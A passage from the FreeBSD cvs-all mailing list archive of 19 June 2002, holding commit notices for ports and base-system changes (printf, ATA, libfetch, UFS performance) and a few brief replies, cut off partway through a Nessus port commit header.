majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:18:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 11E6637B400; Wed, 19 Jun 2002 01:18:11 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8IBY37112; Wed, 19 Jun 2002 01:18:11 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206190818.g5J8IBY37112@freefall.freebsd.org> From: Maxim Sobolev Date: Wed, 19 Jun 2002 01:18:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/archivers/lbrate Makefile ports/audio/cmt Makefile ports/comms/zssh Makefile ports/devel/glib20 Makefile ports/devel/hypersrc Makefile ports/devel/jam Makefile ports/devel/liboop Makefile ports/games/an Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/19 01:18:10 PDT Modified files: archivers/lbrate Makefile audio/cmt Makefile comms/zssh Makefile devel/glib20 Makefile devel/hypersrc Makefile devel/jam Makefile devel/liboop Makefile games/an Makefile graphics/gdk-pixbuf Makefile graphics/swftools Makefile lang/guile Makefile lang/nhc98 Makefile mail/sylpheed-claws Makefile mail/vm-pop3d Makefile math/ploticus Makefile net/libosip Makefile net/ntalk Makefile net/pim6dd Makefile net/pim6sd Makefile net/portfwd Makefile net/py-rt Makefile net/rsync Makefile security/p5-Crypt-PasswdMD5 Makefile sysutils/mktool Makefile textproc/gpp Makefile textproc/scrollkeeper Makefile www/apache2 Makefile www/cgicc Makefile www/gtkhtml Makefile x11/xbindkeys_config Makefile x11-fm/gentoo Makefile x11-toolkits/paragui Makefile x11-wm/metacity-setup Makefile Log: Add USE_REINPLACE where appropriate. Revision Changes Path 1.4 +2 -0 ports/archivers/lbrate/Makefile 1.3 +1 -0 ports/audio/cmt/Makefile 1.4 +1 -0 ports/comms/zssh/Makefile 1.69 +1 -0 ports/devel/glib20/Makefile 1.6 +1 -0 ports/devel/hypersrc/Makefile 1.10 +1 -0 ports/devel/jam/Makefile 1.4 +1 -0 ports/devel/liboop/Makefile 1.6 +1 -0 ports/games/an/Makefile 1.29 +1 -0 ports/graphics/gdk-pixbuf/Makefile 1.4 +1 -0 ports/graphics/swftools/Makefile 1.30 +1 -0 ports/lang/guile/Makefile 1.11 +1 -0 ports/lang/nhc98/Makefile 1.12 +1 -0 ports/mail/sylpheed-claws/Makefile 1.7 +1 -0 ports/mail/vm-pop3d/Makefile 1.4 +1 -0 ports/math/ploticus/Makefile 1.2 +1 -0 ports/net/libosip/Makefile 1.5 +1 -0 ports/net/ntalk/Makefile 1.6 +2 -0 ports/net/pim6dd/Makefile 1.6 +2 -0 ports/net/pim6sd/Makefile 1.2 +1 -0 ports/net/portfwd/Makefile 1.2 +1 -0 ports/net/py-rt/Makefile 1.74 +1 -0 ports/net/rsync/Makefile 1.2 +1 -0 ports/security/p5-Crypt-PasswdMD5/Makefile 1.3 +1 -0 ports/sysutils/mktool/Makefile 1.5 +2 -0 ports/textproc/gpp/Makefile 1.11 +1 -0 ports/textproc/scrollkeeper/Makefile 1.119 +1 -0 ports/www/apache2/Makefile 1.6 +1 -0 ports/www/cgicc/Makefile 1.47 +1 -0 ports/www/gtkhtml/Makefile 1.14 +1 -0 ports/x11-fm/gentoo/Makefile 1.11 +1 -0 ports/x11-toolkits/paragui/Makefile 1.9 +1 -0 ports/x11-wm/metacity-setup/Makefile 1.6 +1 -0 ports/x11/xbindkeys_config/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:18:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4034B37B40A; Wed, 19 Jun 2002 01:18:37 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8IbD37167; Wed, 19 Jun 2002 01:18:37 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190818.g5J8IbD37167@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 01:18:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/printf printf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 01:18:37 PDT Modified files: usr.bin/printf printf.c Log: Allow format strings containing "%%" to be reused. PR: 39116 Submitted by: Egil Brendsdal MFC after: 1 week Revision Changes Path 1.23 +2 -2 src/usr.bin/printf/printf.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:21:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C6C6337B401; Wed, 19 Jun 2002 01:21:27 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8LRM38683; Wed, 19 Jun 2002 01:21:27 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206190821.g5J8LRM38683@freefall.freebsd.org> From: Maxim Sobolev Date: Wed, 19 Jun 2002 01:21:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/Mk bsd.port.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/19 01:21:27 PDT Modified files: Mk bsd.port.mk Log: Change the way REINPLACE_CMD works - instead of using perl(1) on systems where sed(1) can't do in-place editing add a new USE_REINPLACE knob, which if turned on defines REINPLACE_CMD and adds textproc/sed_inplace port into BUILD_DEPENDS if necessary. Not objected by: portmgr@ Revision Changes Path 1.415 +11 -7 ports/Mk/bsd.port.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:30:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 318D737B40D; Wed, 19 Jun 2002 01:30:49 -0700 (PDT) Received: (from sos@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8UnT39957; Wed, 19 Jun 2002 01:30:49 -0700 (PDT) (envelope-from sos) Message-Id: <200206190830.g5J8UnT39957@freefall.freebsd.org> From: Søren Schmidt Date: Wed, 19 Jun 2002 01:30:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/ata ata-all.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sos 2002/06/19 01:30:49 PDT Modified files: (Branch: RELENG_4) sys/dev/ata ata-all.c Log: Fix the tags bug. Too simple really a misplaced splx().. Revision Changes Path 1.50.2.37 +1 -1 src/sys/dev/ata/ata-all.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:36: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9077C37B400; Wed, 19 Jun 2002 01:36:00 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8a0G40498; Wed, 19 Jun 2002 01:36:00 -0700 (PDT) (envelope-from des) Message-Id: <200206190836.g5J8a0G40498@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Wed, 19 Jun 2002 01:36:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libfetch http.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/19 01:36:00 PDT Modified files: lib/libfetch http.c Log: Don't try to dereference conn when we know it's NULL. Revision Changes Path 1.60 +5 -2 src/lib/libfetch/http.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:37: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 06B3537B403; Wed, 19 Jun 2002 01:37:03 -0700 (PDT) Received: (from phk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8b2B40582; Wed, 19 Jun 2002 01:37:02 -0700 (PDT) (envelope-from phk) Message-Id: <200206190837.g5J8b2B40582@freefall.freebsd.org> From: Poul-Henning Kamp Date: Wed, 19 Jun 2002 01:37:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys disklabel.h src/sys/kern sys_generic.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG phk 2002/06/19 01:37:02 PDT Modified files: sys/sys disklabel.h sys/kern sys_generic.c Log: Remove the compat bits for the mis-aligned struct disklabel on alpha, people got three times longer than I promised. Sponsored by: DARPA & NAI Labs. Revision Changes Path 1.102 +0 -22 src/sys/kern/sys_generic.c 1.86 +0 -14 src/sys/sys/disklabel.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2: 5:32 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C421F37B406; Wed, 19 Jun 2002 02:05:28 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 47B445361; Wed, 19 Jun 2002 11:05:26 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Doug Barton Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/rc.d network1 References: <200206182312.g5INCoK33674@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 19 Jun 2002 11:05:26 +0200 In-Reply-To: <200206182312.g5INCoK33674@freefall.freebsd.org> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Doug Barton writes: > Log: > Make nisdomainname=NO DTRT > > Submitted by: des, via Mike Makonnen I didn't submit it - it's all Mike's work. I just reported the bug. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2: 6:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 59ADC37B419; Wed, 19 Jun 2002 02:05:43 -0700 (PDT) Received: (from kuriyama@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J95ht45518; Wed, 19 Jun 2002 02:05:43 -0700 (PDT) (envelope-from kuriyama) Message-Id: <200206190905.g5J95ht45518@freefall.freebsd.org> From: Jun Kuriyama Date: Wed, 19 Jun 2002 02:05:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kuriyama 2002/06/19 02:05:43 PDT Modified files: . modules Log: p5-Search-Namazu --> ports/databases/p5-Search-Namazu Revision Changes Path 1.5386 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2: 6: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E051737B41E; Wed, 19 Jun 2002 02:05:34 -0700 (PDT) Received: (from kuriyama@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J95YT44991; Wed, 19 Jun 2002 02:05:34 -0700 (PDT) (envelope-from kuriyama) Message-Id: <200206190905.g5J95YT44991@freefall.freebsd.org> From: Jun Kuriyama Date: Wed, 19 Jun 2002 02:05:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases Makefile ports/databases/p5-Search-Namazu Makefile distinfo pkg-comment pkg-descr pkg-plist ports/databases/p5-Search-Namazu/files patch-Namazu.pm patch-Namazu.pod.ja patch-Namazu.xs X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kuriyama 2002/06/19 02:05:34 PDT Modified files: databases Makefile Added files: databases/p5-Search-Namazu Makefile distinfo pkg-comment pkg-descr pkg-plist databases/p5-Search-Namazu/files patch-Namazu.pm patch-Namazu.pod.ja patch-Namazu.xs Log: Namazu library module for perl. Revision Changes Path 1.191 +1 -0 ports/databases/Makefile 1.1 +24 -0 ports/databases/p5-Search-Namazu/Makefile (new) 1.1 +1 -0 ports/databases/p5-Search-Namazu/distinfo (new) 1.1 +75 -0 ports/databases/p5-Search-Namazu/files/patch-Namazu.pm (new) 1.1 +17 -0 ports/databases/p5-Search-Namazu/files/patch-Namazu.pod.ja (new) 1.1 +35 -0 ports/databases/p5-Search-Namazu/files/patch-Namazu.xs (new) 1.1 +1 -0 ports/databases/p5-Search-Namazu/pkg-comment (new) 1.1 +2 -0 ports/databases/p5-Search-Namazu/pkg-descr (new) 1.1 +7 -0 ports/databases/p5-Search-Namazu/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2:24:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F18837B404; Wed, 19 Jun 2002 02:24:30 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J9OUb50059; Wed, 19 Jun 2002 02:24:30 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190924.g5J9OUb50059@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 02:24:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/printf printf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 02:24:30 PDT Modified files: usr.bin/printf printf.c Log: Let printf(1) tell the difference between zero width/precision and unspecified width/precision. PR: 39116 Submitted by: Egil Brendsdal MFC after: 1 week Revision Changes Path 1.24 +9 -7 src/usr.bin/printf/printf.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2:39:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C461E37B40D; Wed, 19 Jun 2002 02:39:41 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J9dfc51512; Wed, 19 Jun 2002 02:39:41 -0700 (PDT) (envelope-from dillon) Message-Id: <200206190939.g5J9dfc51512@freefall.freebsd.org> From: Matt Dillon Date: Wed, 19 Jun 2002 02:39:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ufs/ufs ufs_readwrite.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/19 02:39:41 PDT Modified files: sys/ufs/ufs ufs_readwrite.c Log: In rev 1.72 a situation related to write/mmap was fixed which could result in a user process gaining visibility into the 'old' contents of a filesystem block. There were two cases: (1) when uiomove() fails (user process issues illegal write), and (2) when uiomove() overlaps a mmap() of the same file at the same offset (fault -> recursive buffer I/O reads contents of old block). Unfortunately 1.72 also had the unintended effect of forcing the filesystem to do a read-before-write in the case of a full-block-write (non append case), e.g. 'dd if=/dev/zero of=test.dat bs=1m count=256 conv=notrunc'. This destroys performance.. not only is a read forced for every write, but clustering breaks as well. The solution is to clear the buffer manually in the full-block case rather then asking BALLOC to do it (BALLOC issues the read-before-write). In the partial-block case we want BALLOC to do it because the read-before-write is necessary. This patch should greatly improve database and news-feed server performance. Found by: MKI MFC after: 3 days Revision Changes Path 1.90 +11 -7 src/sys/ufs/ufs/ufs_readwrite.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2:42:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4AF1037B401; Wed, 19 Jun 2002 02:42:20 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J9gKC52187; Wed, 19 Jun 2002 02:42:20 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190942.g5J9gKC52187@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 02:42:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/printf printf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 02:42:20 PDT Modified files: usr.bin/printf printf.c Log: Fix duplicate % in %b format introduced in rev 1.22. Revision Changes Path 1.25 +6 -5 src/usr.bin/printf/printf.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 2:57:37 2002 Delivered-To: cvs-all@freebsd.org Received: from utopia.leeym.com (utopia.leeym.com [61.218.64.93]) by hub.freebsd.org (Postfix) with ESMTP id 763E837B40E; Wed, 19 Jun 2002 02:57:32 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by utopia.leeym.com (Postfix) with ESMTP id 5722F3EA645; Wed, 19 Jun 2002 17:57:29 +0800 (CST) Received: by utopia.leeym.com (Postfix, from userid 1000) id D05C73EA644; Wed, 19 Jun 2002 17:57:21 +0800 (CST) Date: Wed, 19 Jun 2002 17:57:21 +0800 From: Yen-Ming Lee To: Clive Lin Cc: Ying-Chieh Liao , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/security/amavis-perl Makefile pkg-install.postfix pkg-message.postfix Message-ID: <20020619095721.GA74638@utopia.leeym.com> Reply-To: Yen-Ming Lee References: <200206171928.g5HJSLe08850@freefall.freebsd.org> <20020618173011.GA4707@epaper.eslitebooks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=big5 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <20020618173011.GA4707@epaper.eslitebooks.com> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by AMaViS perl-11 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 19, 2002 at 01:30:11AM +0800, Clive Lin wrote: > > Okay to close ports PR# 37386 ? > ports/37386 is obsoleted by TAKEMURA Masahiro's patch. so, please close it. :) -- Yen-Ming Lee [§õ«Û©ú] http://www.leeym.com/ "Have the appropriate amount of fun." -- Larry Wall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 3:29:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F3C2437B40A; Wed, 19 Jun 2002 03:29:35 -0700 (PDT) Received: (from kuriyama@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JATZE60694; Wed, 19 Jun 2002 03:29:35 -0700 (PDT) (envelope-from kuriyama) Message-Id: <200206191029.g5JATZE60694@freefall.freebsd.org> From: Jun Kuriyama Date: Wed, 19 Jun 2002 03:29:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/p5-Search-Namazu Makefile distinfo ports/databases/p5-Search-Namazu/files patch-Namazu.pm patch-Namazu.pod.ja patch-Namazu.xs X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kuriyama 2002/06/19 03:29:35 PDT Modified files: databases/p5-Search-Namazu Makefile distinfo Removed files: databases/p5-Search-Namazu/files patch-Namazu.pm patch-Namazu.pod.ja patch-Namazu.xs Log: Upgrade to 0.92 (this upgrade includes my patches). Revision Changes Path 1.2 +1 -1 ports/databases/p5-Search-Namazu/Makefile 1.2 +1 -1 ports/databases/p5-Search-Namazu/distinfo 1.2 +0 -75 ports/databases/p5-Search-Namazu/files/patch-Namazu.pm (dead) 1.2 +0 -17 ports/databases/p5-Search-Namazu/files/patch-Namazu.pod.ja (dead) 1.2 +0 -35 ports/databases/p5-Search-Namazu/files/patch-Namazu.xs (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 3:47:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4BC5337B407; Wed, 19 Jun 2002 03:47:33 -0700 (PDT) Received: (from mbr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JAlXE62623; Wed, 19 Jun 2002 03:47:33 -0700 (PDT) (envelope-from mbr) Message-Id: <200206191047.g5JAlXE62623@freefall.freebsd.org> From: Martin Blapp Date: Wed, 19 Jun 2002 03:47:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/openoffice Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mbr 2002/06/19 03:47:33 PDT Modified files: editors/openoffice Makefile Log: If we build a port with a language different than EN or DE, we need to define the language EN_US too. The documention is english only at the moment. Bug Submitted by: Ivanchenko V. I. Revision Changes Path 1.81 +1 -1 ports/editors/openoffice/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 3:57:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 77F4737B40E; Wed, 19 Jun 2002 03:57:30 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JAvUQ63603; Wed, 19 Jun 2002 03:57:30 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206191057.g5JAvUQ63603@freefall.freebsd.org> From: Maxim Sobolev Date: Wed, 19 Jun 2002 03:57:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/sed_inplace/src compile.c main.c misc.c process.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/19 03:57:29 PDT Modified files: textproc/sed_inplace/src compile.c main.c misc.c process.c Log: Get rid of __FBSDID(), which breaks compilation on 4.4 and down. Submitted by: Alex Dupre Revision Changes Path 1.2 +0 -1 ports/textproc/sed_inplace/src/compile.c 1.2 +0 -1 ports/textproc/sed_inplace/src/main.c 1.2 +0 -1 ports/textproc/sed_inplace/src/misc.c 1.2 +0 -1 ports/textproc/sed_inplace/src/process.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 4: 0:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0DFB237B408; Wed, 19 Jun 2002 04:00:46 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JB0jg67476; Wed, 19 Jun 2002 04:00:45 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206191100.g5JB0jg67476@freefall.freebsd.org> From: Maxim Sobolev Date: Wed, 19 Jun 2002 04:00:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/aureal-kmod Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/19 04:00:45 PDT Modified files: audio/aureal-kmod Makefile Log: Fix test for presence of source tree. Submitted by: imp Revision Changes Path 1.13 +1 -2 ports/audio/aureal-kmod/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 4: 8:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3EF4637B406; Wed, 19 Jun 2002 04:08:53 -0700 (PDT) Received: (from mbr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JB8rq72265; Wed, 19 Jun 2002 04:08:53 -0700 (PDT) (envelope-from mbr) Message-Id: <200206191108.g5JB8rq72265@freefall.freebsd.org> From: Martin Blapp Date: Wed, 19 Jun 2002 04:08:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/openoffice Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mbr 2002/06/19 04:08:52 PDT Modified files: editors/openoffice Makefile Log: Always use the internal stlport if USE_GCC is defined. Revision Changes Path 1.82 +1 -1 ports/editors/openoffice/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 4:13:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B635E37B40E; Wed, 19 Jun 2002 04:13:17 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JBDHm73258; Wed, 19 Jun 2002 04:13:17 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206191113.g5JBDHm73258@freefall.freebsd.org> From: Jimmy Olgeni Date: Wed, 19 Jun 2002 04:13:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/nessus Makefile distinfo pkg-plist ports/security/nessus/files patch-aa patch-ab patch-ag patch-nessus-html_graph_output.c ports/security/nessus-libnasl Makefile distinfo 